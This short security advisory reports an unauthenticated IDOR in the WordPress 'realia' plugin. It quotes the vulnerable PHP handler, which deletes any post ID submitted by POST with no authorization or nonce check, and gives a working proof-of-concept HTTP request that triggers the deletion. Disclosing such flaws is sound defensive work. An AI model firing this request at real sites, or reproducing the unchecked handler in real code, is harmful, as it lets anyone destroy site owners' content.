While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, the realia plugin was found to be the cause of it.
In fact, having this plugin installed can allow unauthenticated attackers to delete arbitrary posts, by submitting a malicious request with the post ID to delete.
In includes/class-realia-submission.php
add_action( 'init', array( __CLASS__, 'process_remove_form' ), 9999 );
[...]
public static function process_remove_form() {
if ( ! isset( $_POST['remove_property_form'] ) || empty( $_POST['property_id'] ) ) {
return;
}
if ( wp_delete_post( $_POST['property_id'] ) ) {
$_SESSION['messages'][] = array( 'success', __( 'Property has been successfully removed.', 'realia' ) );
} else {
$_SESSION['messages'][] = array( 'danger', __( 'An error occured when removing an item.', 'realia' ) );
}
}PoC:
POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: PoC/Realia-1.4-IDOR
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 35
property_id=7&remove_property_form=